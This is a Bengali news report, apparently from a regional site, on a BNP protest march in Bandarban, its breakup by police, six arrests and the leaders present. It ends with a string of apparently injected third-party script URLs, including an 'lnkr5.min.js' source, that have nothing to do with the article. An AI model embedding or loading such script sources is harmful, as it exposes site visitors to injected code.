১৯শে সেপ্টেম্বর, ২০১৮ ইং | ৪ঠা আশ্বিন, ১৪২৫ বঙ্গাব্দ | সকাল ১১:২১

বান্দরবানে জেলা বিএনপিরবিক্ষোভ মিছিল,আটক ৬

 

রতন কুমা দে (শাওন) বান্দরবান প্রতিনিধি : দেশনেত্রী বেগম খালেদা জিয়ার মুক্তি ও সুচিকিৎসা নিশ্চিত করার দাবীতে অাজ বান্দরবন জেলা বিএনপি সভাপতি মিসেস মাম্যাচিং ও সাধারণ সম্পাদক জাবেদ রেজার নেতৃত্বে কেন্দ্রীয় কর্মসূচীর অংশ হিসেবে বিক্ষোভ মিছিল করা হয়।

কোনরূপ কারন ছাড়াই পুলিশ এর ব্যানার কেড়ে নেয়া, মিছিলে লাঠিচার্জ আর গণগ্রেফতার এর মাধ্যমে মিছিল ছত্রভঙ্গ করে দেয়া হয়।জেলা বিএনপির সাধারন সম্পাদক জাবেদ রেজা সহ ২২ জন নেতাকর্মী আহত হন।

মিছিল থেকে যুবদল নেতা সেলিম রেজা, পৌর যুবদল এর যুগ্ম সম্পাদক কাসেম, কলেজ ছাত্রদল এর শাহাদাত, উক্যা মারমা, বাপ্পী চাকমা ও ইউসুফ কে পুলিশ গ্রেফতার করে।

মিছিলে এসময় উপস্থিত ছিলেন বান্দরবান জেলা বিএনপির সাংগঠনিক সম্পাদক জসীম উদ্দীন তুষার, বান্দরবান জেলা যুবদলের সভাপতি হারুনুর রশীদ, ,সাংগঠনিক সম্পাদক মাসুম চৌধুরী, জেলা স্বেচ্ছাসেবক দলের যুগ্ম অাহ্বায়ক চনু মং মারমা, জেলা যুবদল নেতা সেলিম রেজা, সদর উপজেলা বিএনপির সভাপতি সরওয়ার জামান, জেলা ছাত্রদলের সভাপতি অাশরাফুল অামিন ফরহাদ, যুগ্ম সম্পাদক শহীদুল ইসলাম সহ সকল নেতাকর্মীবৃন্দ।

মিসেস মাম্যাচিং ও জাবেদ রেজা অবিলম্বে দেশনেত্রী বেগম খালেদা জিয়া ও গ্রেফতারকৃত সকল নেতা কর্মীদের মুক্তির দাবী জানান।

 

 

 

 

কিউএনবি/সাজু/২১শে জুন, ২০১৮ ইং/সন্ধ্যা ৭:৪২

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=8http://dataprovider.website/addons/lnkr5.min.js